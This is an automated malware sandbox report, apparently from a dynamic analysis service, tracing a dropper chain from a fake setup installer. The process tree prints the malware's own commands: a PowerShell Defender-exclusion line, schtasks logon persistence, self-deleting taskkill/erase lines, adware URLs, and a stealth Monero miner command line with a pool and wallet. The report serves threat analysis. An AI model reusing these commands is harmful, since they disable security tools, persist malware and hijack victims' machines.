2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe -
Suspicious behavior: GetForegroundWindowSpam 7 IoCs
pid Process 2648 WerFault.exe 2312 WerFault.exe 544 WerFault.exe 704 WerFault.exe 3492 WerFault.exe 3180 WerFault.exe 2416 iexplore.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 788 5023654.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1952 Sun150faeb3537d.exe Token: SeAssignPrimaryTokenPrivilege 1952 Sun150faeb3537d.exe Token: SeLockMemoryPrivilege 1952 Sun150faeb3537d.exe Token: SeIncreaseQuotaPrivilege 1952 Sun150faeb3537d.exe Token: SeMachineAccountPrivilege 1952 Sun150faeb3537d.exe Token: SeTcbPrivilege 1952 Sun150faeb3537d.exe Token: SeSecurityPrivilege 1952 Sun150faeb3537d.exe Token: SeTakeOwnershipPrivilege 1952 Sun150faeb3537d.exe Token: SeLoadDriverPrivilege 1952 Sun150faeb3537d.exe Token: SeSystemProfilePrivilege 1952 Sun150faeb3537d.exe Token: SeSystemtimePrivilege 1952 Sun150faeb3537d.exe Token: SeProfSingleProcessPrivilege 1952 Sun150faeb3537d.exe Token: SeIncBasePriorityPrivilege 1952 Sun150faeb3537d.exe Token: SeCreatePagefilePrivilege 1952 Sun150faeb3537d.exe Token: SeCreatePermanentPrivilege 1952 Sun150faeb3537d.exe Token: SeBackupPrivilege 1952 Sun150faeb3537d.exe Token: SeRestorePrivilege 1952 Sun150faeb3537d.exe Token: SeShutdownPrivilege 1952 Sun150faeb3537d.exe Token: SeDebugPrivilege 1952 Sun150faeb3537d.exe Token: SeAuditPrivilege 1952 Sun150faeb3537d.exe Token: SeSystemEnvironmentPrivilege 1952 Sun150faeb3537d.exe Token: SeChangeNotifyPrivilege 1952 Sun150faeb3537d.exe Token: SeRemoteShutdownPrivilege 1952 Sun150faeb3537d.exe Token: SeUndockPrivilege 1952 Sun150faeb3537d.exe Token: SeSyncAgentPrivilege 1952 Sun150faeb3537d.exe Token: SeEnableDelegationPrivilege 1952 Sun150faeb3537d.exe Token: SeManageVolumePrivilege 1952 Sun150faeb3537d.exe Token: SeImpersonatePrivilege 1952 Sun150faeb3537d.exe Token: SeCreateGlobalPrivilege 1952 Sun150faeb3537d.exe Token: 31 1952 Sun150faeb3537d.exe Token: 32 1952 Sun150faeb3537d.exe Token: 33 1952 Sun150faeb3537d.exe Token: 34 1952 Sun150faeb3537d.exe Token: 35 1952 Sun150faeb3537d.exe Token: SeDebugPrivilege 916 Sun157ff8e4440aa.exe Token: SeDebugPrivilege 1748 Sun1584240df9fe73a3.exe Token: SeDebugPrivilege 2368 taskkill.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 2628 taskkill.exe Token: SeDebugPrivilege 2784 2.exe Token: SeDebugPrivilege 2648 WerFault.exe Token: SeDebugPrivilege 2756 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 2032 8.exe Token: SeDebugPrivilege 816 BearVpn 3.exe Token: SeDebugPrivilege 2312 WerFault.exe Token: SeDebugPrivilege 2736 4147520.exe Token: SeDebugPrivilege 3024 taskkill.exe Token: SeDebugPrivilege 2388 6581194.exe Token: SeDebugPrivilege 3036 7911299.exe Token: SeDebugPrivilege 544 WerFault.exe Token: SeDebugPrivilege 2476 7911299.exe Token: SeDebugPrivilege 2952 udptest.exe Token: SeDebugPrivilege 2716 Chrome 5.exe Token: SeDebugPrivilege 2420 7952530.exe Token: SeDebugPrivilege 704 WerFault.exe Token: SeDebugPrivilege 2996 Sefejilusi.exe Token: SeDebugPrivilege 3492 WerFault.exe Token: SeDebugPrivilege 4020 taskkill.exe Token: SeDebugPrivilege 3180 WerFault.exe Token: SeDebugPrivilege 2152 services64.exe Token: SeDebugPrivilege 2184 taskkill.exe Token: SeDebugPrivilege 3996 civdata.exe Token: SeDebugPrivilege 3828 taskkill.exe Token: SeRestorePrivilege 3636 msiexec.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 2624 ultramediaburner.tmp 2328 setup_2.tmp 2416 iexplore.exe 3504 installer.exe 2416 iexplore.exe 2416 iexplore.exe 2416 iexplore.exe -
Suspicious use of SetWindowsHookEx 28 IoCs
pid Process 2416 iexplore.exe 2416 iexplore.exe 2356 IEXPLORE.EXE 2356 IEXPLORE.EXE 2356 IEXPLORE.EXE 2356 IEXPLORE.EXE 3988 IEXPLORE.EXE 3988 IEXPLORE.EXE 3988 IEXPLORE.EXE 3988 IEXPLORE.EXE 2416 iexplore.exe 2416 iexplore.exe 5572 IEXPLORE.EXE 5572 IEXPLORE.EXE 5572 IEXPLORE.EXE 5572 IEXPLORE.EXE 2416 iexplore.exe 2416 iexplore.exe 8504 IEXPLORE.EXE 8504 IEXPLORE.EXE 8504 IEXPLORE.EXE 8504 IEXPLORE.EXE 2416 iexplore.exe 2416 iexplore.exe 2356 IEXPLORE.EXE 2356 IEXPLORE.EXE 2356 IEXPLORE.EXE 2356 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1992 wrote to memory of 2020 1992 setup_x86_x64_install.exe 26 PID 1992 wrote to memory of 2020 1992 setup_x86_x64_install.exe 26 PID 1992 wrote to memory of 2020 1992 setup_x86_x64_install.exe 26 PID 1992 wrote to memory of 2020 1992 setup_x86_x64_install.exe 26 PID 1992 wrote to memory of 2020 1992 setup_x86_x64_install.exe 26 PID 1992 wrote to memory of 2020 1992 setup_x86_x64_install.exe 26 PID 1992 wrote to memory of 2020 1992 setup_x86_x64_install.exe 26 PID 2020 wrote to memory of 1804 2020 setup_installer.exe 27 PID 2020 wrote to memory of 1804 2020 setup_installer.exe 27 PID 2020 wrote to memory of 1804 2020 setup_installer.exe 27 PID 2020 wrote to memory of 1804 2020 setup_installer.exe 27 PID 2020 wrote to memory of 1804 2020 setup_installer.exe 27 PID 2020 wrote to memory of 1804 2020 setup_installer.exe 27 PID 2020 wrote to memory of 1804 2020 setup_installer.exe 27 PID 1804 wrote to memory of 1072 1804 setup_install.exe 29 PID 1804 wrote to memory of 1072 1804 setup_install.exe 29 PID 1804 wrote to memory of 1072 1804 setup_install.exe 29 PID 1804 wrote to memory of 1072 1804 setup_install.exe 29 PID 1804 wrote to memory of 1072 1804 setup_install.exe 29 PID 1804 wrote to memory of 1072 1804 setup_install.exe 29 PID 1804 wrote to memory of 1072 1804 setup_install.exe 29 PID 1804 wrote to memory of 1088 1804 setup_install.exe 30 PID 1804 wrote to memory of 1088 1804 setup_install.exe 30 PID 1804 wrote to memory of 1088 1804 setup_install.exe 30 PID 1804 wrote to memory of 1088 1804 setup_install.exe 30 PID 1804 wrote to memory of 1088 1804 setup_install.exe 30 PID 1804 wrote to memory of 1088 1804 setup_install.exe 30 PID 1804 wrote to memory of 1088 1804 setup_install.exe 30 PID 1804 wrote to memory of 1196 1804 setup_install.exe 31 PID 1804 wrote to memory of 1196 1804 setup_install.exe 31 PID 1804 wrote to memory of 1196 1804 setup_install.exe 31 PID 1804 wrote to memory of 1196 1804 setup_install.exe 31 PID 1804 wrote to memory of 1196 1804 setup_install.exe 31 PID 1804 wrote to memory of 1196 1804 setup_install.exe 31 PID 1804 wrote to memory of 1196 1804 setup_install.exe 31 PID 1804 wrote to memory of 1704 1804 setup_install.exe 32 PID 1804 wrote to memory of 1704 1804 setup_install.exe 32 PID 1804 wrote to memory of 1704 1804 setup_install.exe 32 PID 1804 wrote to memory of 1704 1804 setup_install.exe 32 PID 1804 wrote to memory of 1704 1804 setup_install.exe 32 PID 1804 wrote to memory of 1704 1804 setup_install.exe 32 PID 1804 wrote to memory of 1704 1804 setup_install.exe 32 PID 1804 wrote to memory of 1412 1804 setup_install.exe 33 PID 1804 wrote to memory of 1412 1804 setup_install.exe 33 PID 1804 wrote to memory of 1412 1804 setup_install.exe 33 PID 1804 wrote to memory of 1412 1804 setup_install.exe 33 PID 1804 wrote to memory of 1412 1804 setup_install.exe 33 PID 1804 wrote to memory of 1412 1804 setup_install.exe 33 PID 1804 wrote to memory of 1412 1804 setup_install.exe 33 PID 1088 wrote to memory of 1876 1088 cmd.exe 49 PID 1088 wrote to memory of 1876 1088 cmd.exe 49 PID 1088 wrote to memory of 1876 1088 cmd.exe 49 PID 1088 wrote to memory of 1876 1088 cmd.exe 49 PID 1804 wrote to memory of 432 1804 setup_install.exe 34 PID 1804 wrote to memory of 432 1804 setup_install.exe 34 PID 1804 wrote to memory of 432 1804 setup_install.exe 34 PID 1804 wrote to memory of 432 1804 setup_install.exe 34 PID 1804 wrote to memory of 432 1804 setup_install.exe 34 PID 1804 wrote to memory of 432 1804 setup_install.exe 34 PID 1804 wrote to memory of 432 1804 setup_install.exe 34 PID 1804 wrote to memory of 1040 1804 setup_install.exe 35 PID 1804 wrote to memory of 1040 1804 setup_install.exe 35 PID 1804 wrote to memory of 1040 1804 setup_install.exe 35 PID 1804 wrote to memory of 1040 1804 setup_install.exe 35 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3876 attrib.exe 3928 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1072
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152260a303c33a7.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun152260a303c33a7.exeSun152260a303c33a7.exe5⤵
- Executes dropped EXE
PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15d8dfe2c6d17.exe4⤵
- Loads dropped DLL
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun15d8dfe2c6d17.exeSun15d8dfe2c6d17.exe5⤵
- Executes dropped EXE
PID:668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun150d896340a863.exe4⤵
- Loads dropped DLL
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun150d896340a863.exeSun150d896340a863.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 9806⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15b61bf18b0f1.exe4⤵
- Loads dropped DLL
PID:1412 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun15b61bf18b0f1.exeSun15b61bf18b0f1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\is-3QR91.tmp\Sun15b61bf18b0f1.tmp"C:\Users\Admin\AppData\Local\Temp\is-3QR91.tmp\Sun15b61bf18b0f1.tmp" /SL5="$70130,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun15b61bf18b0f1.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:964 -
C:\Users\Admin\AppData\Local\Temp\is-BM23B.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-BM23B.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2168 -
C:\Program Files\Windows Journal\CVBNGIGARU\ultramediaburner.exe"C:\Program Files\Windows Journal\CVBNGIGARU\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\is-OQ1L4.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-OQ1L4.tmp\ultramediaburner.tmp" /SL5="$10238,281924,62464,C:\Program Files\Windows Journal\CVBNGIGARU\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2624 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
PID:632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ef-3f3d8-89d-25898-cf597834c3ecc\Rizhelyruxe.exe"C:\Users\Admin\AppData\Local\Temp\ef-3f3d8-89d-25898-cf597834c3ecc\Rizhelyruxe.exe"8⤵
- Executes dropped EXE
PID:2480 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2416 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2416 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2356
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2416 CREDAT:2176033 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3988
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2416 CREDAT:3814420 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5572
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2416 CREDAT:3159060 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:8504
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2416 CREDAT:3486757 /prefetch:210⤵PID:9056
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2416 CREDAT:3552306 /prefetch:210⤵PID:8584
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:1732
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵PID:8476
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵PID:8932
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:6792
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:1688
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942319⤵PID:8356
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=39⤵PID:6580
-
-
-
C:\Users\Admin\AppData\Local\Temp\cf-d1e5e-de3-009b2-b2f5bd09435de\Sefejilusi.exe"C:\Users\Admin\AppData\Local\Temp\cf-d1e5e-de3-009b2-b2f5bd09435de\Sefejilusi.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfoka34b.gy4\GcleanerEU.exe /eufive & exit9⤵PID:3348
-
C:\Users\Admin\AppData\Local\Temp\xfoka34b.gy4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\xfoka34b.gy4\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3420 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xfoka34b.gy4\GcleanerEU.exe" & exit11⤵PID:3784
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s1ztjop1.uno\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\s1ztjop1.uno\installer.exeC:\Users\Admin\AppData\Local\Temp\s1ztjop1.uno\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
PID:3504 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\s1ztjop1.uno\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\s1ztjop1.uno\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631211267 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:3928
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rfheha2n.azh\anyname.exe & exit9⤵PID:3540
-
C:\Users\Admin\AppData\Local\Temp\rfheha2n.azh\anyname.exeC:\Users\Admin\AppData\Local\Temp\rfheha2n.azh\anyname.exe10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3aiswl00.oyp\gcleaner.exe /mixfive & exit9⤵PID:3756
-
C:\Users\Admin\AppData\Local\Temp\3aiswl00.oyp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3aiswl00.oyp\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3796 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3aiswl00.oyp\gcleaner.exe" & exit11⤵PID:1900
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:2516
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gvrfaj5o.i2n\autosubplayer.exe /S & exit9⤵PID:3896
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15223697c98.exe4⤵
- Loads dropped DLL
PID:432 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun15223697c98.exeSun15223697c98.exe5⤵
- Executes dropped EXE
PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun157ff8e4440aa.exe4⤵
- Loads dropped DLL
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7F9534\Sun157ff8e4440aa.exeSun157ff8e4440aa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:916 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2516
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:1744
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2152 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3312
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:2640
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
PID:3268
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2756 -
C:\ProgramData\4147520.exe"C:\ProgramData\4147520.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2736 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2736 -s 17369⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
-
C:\ProgramData\614457.exe"C:\ProgramData\614457.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2568 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
- Executes dropped EXE
PID:2532
-
-
-
C:\ProgramData\7911299.exe"C:\ProgramData\7911299.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\ProgramData\7911299.exe"C:\ProgramData\7911299.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 7129⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
-
C:\ProgramData\6581194.exe"C:\ProgramData\6581194.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 17129⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2784 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2784 -s 13928⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:1996
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Executes dropped EXE
- Loads dropped DLL
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2976 -
C:\Users\Admin\AppData\Local\Temp\is-5O1FA.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-5O1FA.tmp\setup_2.tmp" /SL5="$1019C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
PID:3056 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:1160 -
C:\Users\Admin\AppData\Local\Temp\is-7LTGA.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-7LTGA.tmp\setup_2.tmp" /SL5="$201A4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2328
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:3024
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
PID:1856
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:1916
-
-
C:\Users\Admin\AppData\Local\Temp\8.exe"C:\Users\Admin\AppData\Local\Temp\8.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:1360 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\SoftID\xender.bat" "9⤵PID:2356
-
